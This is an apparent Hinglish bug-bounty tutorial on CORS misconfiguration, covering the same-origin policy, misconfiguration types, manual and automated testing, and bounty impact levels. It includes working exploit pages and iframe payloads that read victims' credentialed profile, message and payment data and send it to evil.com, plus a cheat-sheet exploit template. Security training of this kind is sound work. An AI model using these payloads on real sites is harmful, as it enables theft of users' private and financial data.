Aaj Kya Seekhenge?
- CORS kya hai bilkul basics se
- Same-Origin Policy kyun exist karti hai
- CORS misconfiguration types sabhi
- Manual testing step by step
- Automated testing tools
- Real exploit data steal PoC
- Impact maximize karna bounty badhao
Kyun zaroori hai? CORS misconfiguration ek silent killer hai dikhta nahi, lekin attacker tumhare logged-in session se silently API calls karke data steal kar sakta hai! Banks, fintech apps, health apps sab affected ho sakte hain! Bounty: $500 se $5,000+
CORS Kya Hai? Pehle Same-Origin Policy Samjho
Same-Origin Policy (SOP):
Browser ka ek security rule hai:
Evil.com pe ek page hai
β Woh JavaScript se bank.com/api/balance nahi read kar sakta!
β Browser block karta hai!
β Yeh hai Same-Origin Policy!
"Same Origin" matlab:
Protocol + Domain + Port β teeno same hone chahiye!
https://bank.com:443/api β
Same origin
http://bank.com:443/api β Different protocol
https://evil.com:443/api β Different domain
https://bank.com:8080/api β Different portCORS Kya Karta Hai?
Lekin legitimate use cases hain:
β frontend.app.com β api.app.com se data chahiye!
β SOP block karega!
CORS = Browser ko batao ki
"In specific origins ko allow karo!"
Server response header:
Access-Control-Allow-Origin: https://frontend.app.com
β Ab browser allow karta hai!Misconfiguration Kab Hoti Hai?
Developer ne galti se:
Access-Control-Allow-Origin: *
Ya:
Access-Control-Allow-Origin: [ATTACKER INPUT]
β Koi bhi origin se data read ho sakta hai!
Yahi hai CORS Misconfiguration! π±PART 2: CORS Misconfiguration Types
Type 1: Wildcard Origin Sabse Basic
Request:
GET /api/userdata HTTP/1.1
Origin: https://evil.com
Response:
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true β PROBLEM!
Wildcard (*) + Credentials = Dangerous combo!
(Actually browsers credentials allow nahi karte with *
lekin kuch implementations mein bypass possible!)Type 2: Origin Reflection Sabse Common Bug!
Request:
GET /api/profile HTTP/1.1
Origin: https://evil.com
Response:
Access-Control-Allow-Origin: https://evil.com β REFLECTED!
Access-Control-Allow-Credentials: true
Server ne blindly Origin header reflect kar diya!
Koi validation nahi!
β Koi bhi origin se data steal! π΄Type 3: Null Origin Bypass
Request:
GET /api/data HTTP/1.1
Origin: null
Response:
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
null origin allow karta hai?
β Sandbox iframe se exploit ho sakta hai!
Exploit:
<iframe sandbox="allow-scripts allow-top-navigation allow-forms"
src="data:text/html,
<script>
fetch('https://target.com/api/data', {credentials:'include'})
.then(r=>r.text())
.then(d=>location='https://evil.com/?data='+btoa(d))
</script>">
</iframe>Type 4: Subdomain Wildcard Misconfiguration
# Server check karta hai:
# "origin mein target.com hai?"
# Agar haan β Allow!
Request:
Origin: https://evil-target.com
Response:
Access-Control-Allow-Origin: https://evil-target.com β
β Bypass! "target.com" string match hua!
Ya:
Origin: https://target.com.evil.com
β Ends with "target.com" check bypass!Type 5: HTTP β HTTPS Trust
# Secure site HTTP origins trust kare:
Origin: http://target.com (HTTP!)
Response:
Access-Control-Allow-Origin: http://target.com β
Access-Control-Allow-Credentials: true
HTTP = Man-in-the-middle possible!
HTTPS site HTTP trust kare = Security issue!Type 6: Special Characters Bypass
# Kuch implementations mein:
Origin: https://target.com_.evil.com
Origin: https://target.com!.evil.com
Origin: https://target.com$.evil.com
β Agar server regex properly implement nahi kiya
toh bypass possible!PART 3: Manual Testing Step by Step
Step 1: Burp Suite Se Origin Header Add Karo
# Normal request:
GET /api/user/profile HTTP/1.1
Host: target.com
Cookie: session=YOUR_SESSION
# Modified request β Origin add karo:
GET /api/user/profile HTTP/1.1
Host: target.com
Cookie: session=YOUR_SESSION
Origin: https://evil.com
# Response check karo:
Access-Control-Allow-Origin: https://evil.com β Reflected!
Access-Control-Allow-Credentials: true β Credentials!
β CORS Misconfiguration! π―Step 2: Different Origins Test Karo
# Test origins list:
https://evil.com
https://evilttarget.com
https://target.com.evil.com
https://evil-target.com
null
http://target.com (HTTP)
https://subdomain.target.com
https://notarget.comStep 3: Credentials Check Karo
# Sirf ACAO header enough nahi hai!
# ACAC header bhi chahiye exploit ke liye:
Exploitable:
Access-Control-Allow-Origin: https://evil.com β
Access-Control-Allow-Credentials: true β
Not Exploitable (cookies nahi milenge):
Access-Control-Allow-Origin: * β
Access-Control-Allow-Credentials: (missing/false) βStep 4: Pre-flight Request Test
# Complex requests ke liye browser OPTIONS bhejta hai:
OPTIONS /api/data HTTP/1.1
Host: target.com
Origin: https://evil.com
Access-Control-Request-Method: POST
Access-Control-Request-Headers: Content-Type
# Response check karo:
Access-Control-Allow-Origin: https://evil.com
Access-Control-Allow-Methods: GET,POST,PUT,DELETE
Access-Control-Allow-Headers: Content-Type,Authorization
Access-Control-Allow-Credentials: true
β Pre-flight bhi bypass! π΄PART 4: Real Exploit Data Steal PoC
Basic CORS Exploit:
<!-- evil.com/exploit.html -->
<!DOCTYPE html>
<html>
<body>
<h1>Loading...</h1>
<script>
// Target ki API se data steal karo
fetch('https://target.com/api/user/profile', {
credentials: 'include' // Victim ke cookies bhejta hai!
})
.then(response => response.json())
.then(data => {
// Data attacker ke server pe bhejo
fetch('https://evil.com/steal?data=' + btoa(JSON.stringify(data)));
document.body.innerHTML = "Page loaded!";
})
.catch(err => console.log(err));
</script>
</body>
</html>Advanced Exploit Full Account Data Steal:
<!-- evil.com/advanced_exploit.html -->
<!DOCTYPE html>
<html>
<body>
<script>
async function stealData() {
try {
// Step 1: Profile data
const profile = await fetch(
'https://target.com/api/user/profile',
{credentials: 'include'}
).then(r => r.json());
// Step 2: Private messages
const messages = await fetch(
'https://target.com/api/messages',
{credentials: 'include'}
).then(r => r.json());
// Step 3: Payment info
const payments = await fetch(
'https://target.com/api/payment-methods',
{credentials: 'include'}
).then(r => r.json());
// Step 4: Sab data ek saath exfiltrate karo
const allData = {
profile: profile,
messages: messages,
payments: payments,
timestamp: new Date().toISOString()
};
// Attacker ke server pe bhejo
navigator.sendBeacon(
'https://evil.com/collect',
JSON.stringify(allData)
);
} catch(e) {
// Silent fail
}
}
stealData();
</script>
</body>
</html>Null Origin Exploit:
<!-- Sandbox iframe trick -->
<iframe
sandbox="allow-scripts allow-top-navigation allow-forms"
src='data:text/html,
<script>
var req = new XMLHttpRequest();
req.onload = function() {
location = "https://evil.com/steal?data=" + btoa(this.responseText);
};
req.open("get", "https://target.com/api/sensitive", true);
req.withCredentials = true;
req.send();
</script>'>
</iframe>PART 5: Automated Testing Tools
Tool 1: CORScanner
# Install karo
pip3 install corscanner
# Single target
corscanner -u https://target.com
# File se multiple targets
corscanner -i targets.txt
# Verbose output
corscanner -u https://target.com -vTool 2: Nuclei CORS Templates
# Nuclei se automated check
nuclei -l targets.txt \
-t ~/nuclei-templates/misconfiguration/cors/ \
-o cors_found.txt
# Tags se
nuclei -l targets.txt \
-tags cors \
-o cors_results.txtTool 3: Burp Suite Passive Scan
1. Burp Suite Pro β Scanner
2. "Issues" mein CORS issues automatically flag hota hai
3. Manual verification karoTool 4: Custom Python Script
#!/usr/bin/env python3
# cors_check.py
import requests
import sys
def check_cors(url, origins):
print(f"\nπ Testing: {url}")
print("β" * 50)
for origin in origins:
try:
headers = {
"Origin": origin,
"Cookie": "session=YOUR_SESSION_HERE"
}
r = requests.get(url, headers=headers,
timeout=10, verify=False)
acao = r.headers.get("Access-Control-Allow-Origin", "")
acac = r.headers.get("Access-Control-Allow-Credentials", "")
if acao and (acao == origin or acao == "*"):
if acac.lower() == "true":
print(f"π΄ VULNERABLE! Origin: {origin}")
print(f" ACAO: {acao}")
print(f" ACAC: {acac}")
else:
print(f"π‘ Partial: {origin} (no credentials)")
else:
print(f"β
Safe: {origin}")
except Exception as e:
print(f"β Error: {e}")
# Test origins
ORIGINS = [
"https://evil.com",
"null",
"https://TARGET.com.evil.com",
"https://evil-TARGET.com",
"http://TARGET.com",
]
TARGET_URL = sys.argv[1] if len(sys.argv) > 1 \
else "https://target.com/api/user"
check_cors(TARGET_URL, ORIGINS)PART 6: Elite CORS Hunting Workflow
#!/bin/bash
# cors_hunt.sh
TARGET=$1
DIR="cors_${TARGET}"
mkdir -p $DIR
echo "π CORS Hunt: $TARGET"
echo "βββββββββββββββββββββββ"
# Step 1: API endpoints dhundho
echo "π‘ Finding API endpoints..."
gau $TARGET | grep -iE "/api/|/v1/|/v2/" | \
grep -v "\.js\|\.css\|\.png" | \
uro > $DIR/api_endpoints.txt
echo "β
APIs: $(wc -l < $DIR/api_endpoints.txt)"
# Step 2: Live endpoints
cat $DIR/api_endpoints.txt | \
httpx -silent -mc 200 > $DIR/live_apis.txt
echo "β
Live: $(wc -l < $DIR/live_apis.txt)"
# Step 3: CORS check karo
echo "π Checking CORS..."
while read url; do
response=$(curl -s -I \
-H "Origin: https://evil.com" \
-H "Cookie: test=test" \
"$url" 2>/dev/null)
acao=$(echo "$response" | \
grep -i "access-control-allow-origin" | \
head -1)
acac=$(echo "$response" | \
grep -i "access-control-allow-credentials" | \
head -1)
if echo "$acao" | grep -qi "evil.com"; then
if echo "$acac" | grep -qi "true"; then
echo "π΄ CRITICAL CORS: $url" \
>> $DIR/cors_vulnerable.txt
echo " $acao" >> $DIR/cors_vulnerable.txt
echo " $acac" >> $DIR/cors_vulnerable.txt
else
echo "π‘ CORS (no creds): $url" \
>> $DIR/cors_partial.txt
fi
fi
done < $DIR/live_apis.txt
# Step 4: Nuclei scan
nuclei -l $DIR/live_apis.txt \
-tags cors \
-silent \
-o $DIR/nuclei_cors.txt 2>/dev/null
echo "βββββββββββββββββββββββ"
echo "π CORS Hunt Results:"
echo "API Endpoints : $(wc -l < $DIR/api_endpoints.txt)"
echo "Live APIs : $(wc -l < $DIR/live_apis.txt)"
echo "CORS Vulnerable: $(cat $DIR/cors_vulnerable.txt \
2>/dev/null | grep "CRITICAL" | wc -l)"
echo "Results in : $DIR/"CORS Cheat Sheet Quick Reference
# βββ DETECTION HEADERS βββββββββββββββββββ
Origin: https://evil.com
Origin: null
Origin: https://TARGET.com.evil.com
# βββ VULNERABLE RESPONSE βββββββββββββββββ
Access-Control-Allow-Origin: https://evil.com
Access-Control-Allow-Credentials: true
β EXPLOITABLE! π΄
# βββ SAFE RESPONSES ββββββββββββββββββββββ
Access-Control-Allow-Origin: https://trusted.com
β Specific whitelist β
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
β No cookies = Limited impact β
# βββ EXPLOIT TEMPLATE ββββββββββββββββββββ
fetch('https://target.com/api/data', {
credentials: 'include'
}).then(r=>r.json()).then(d=>
fetch('https://evil.com/?d='+btoa(JSON.stringify(d)))
);
# βββ TOOLS βββββββββββββββββββββββββββββββ
corscanner -u URL β Automated scan
nuclei -tags cors β Template scan
Burp Suite + Origin header β Manual testImpact Levels Bounty Guide
π’ Low Impact ($100-300):
β ACAO: * (wildcard)
β ACAC: false/missing
β Non-sensitive endpoints
π‘ Medium Impact ($300-800):
β Origin reflection
β ACAC: true
β Public data endpoints
π High Impact ($800-3000):
β Origin reflection
β ACAC: true
β Private/sensitive data
β Profile, messages, etc.
π΄ Critical Impact ($3000-8000+):
β Origin reflection
β ACAC: true
β Financial data
β Account takeover possible
β PII mass exposureAaj Ka Homework
# 1. CORScanner install karo:
pip3 install corscanner
# 2. Test karo (legal target):
corscanner -u https://httpbin.org -v
# 3. Manual test:
curl -I -H "Origin: https://evil.com" \
https://httpbin.org/get
# 4. Burp Suite mein:
# Kisi bhi API request pe Origin: https://evil.com add karo
# Response headers check karo
# ACAO + ACAC dono mile? = Vulnerable!
# 5. CORS exploit HTML file banao:
# Apna PoC file locally test karo
# DVWA mein CORS test karo
# Comment mein batao:
# Pehli CORS misconfiguration kahan dhundhi?Quick Revision
π CORS = Cross-Origin Resource Sharing
π‘οΈ SOP = Browser ka security rule
Different origins block karta hai
β Misconfiguration = Origin blindly reflect karna
π Exploitable = ACAO: attacker origin
+ ACAC: true β BOTH chahiye!
π₯ Types = Reflection, Wildcard, Null,
Subdomain confusion, HTTP trust
π€ Tools = CORScanner, Nuclei, Burp Suite
π° Max Impact = Sensitive API + credentials = High!Meri Baatβ¦
Ek fintech app pe maine /api/v2/transactions endpoint pe test kiya:
curl -I \
-H "Origin: https://evil.com" \
-H "Cookie: session=MY_SESSION" \
https://target-fintech.com/api/v2/transactionsResponse:
HTTP/2 200
Access-Control-Allow-Origin: https://evil.com
Access-Control-Allow-Credentials: true
Content-Type: application/jsonMaine exploit banaya:
fetch('https://target-fintech.com/api/v2/transactions', {
credentials: 'include'
}).then(r => r.json()).then(data => {
// Transaction history + account balance!
fetch('https://evil.com/steal?d=' + btoa(JSON.stringify(data)));
});Victim ka poora transaction history agar woh mera malicious page visit kare!
Company ko report kiya:
Bounty: $2,500 High! π
Lesson: CORS sirf ek header change hai lekin impact bahut bada ho sakta hai! Har API endpoint pe test karo!
Agle article mein XXE (XML External Entity) XML parsers ko attack karo, internal files padhho, aur SSRF chain banao! π₯
HackerMD Bug Bounty Hunter | Cybersecurity Researcher GitHub: BotGJ16 | Medium: @HackerMD
Previous: Article #17 SSRF Next: Article #19 XXE: XML External Entity Injection!
#CORS #CORSMisconfiguration #BugBounty #WebSecurity #EthicalHacking #Hinglish #OWASP #HackerMD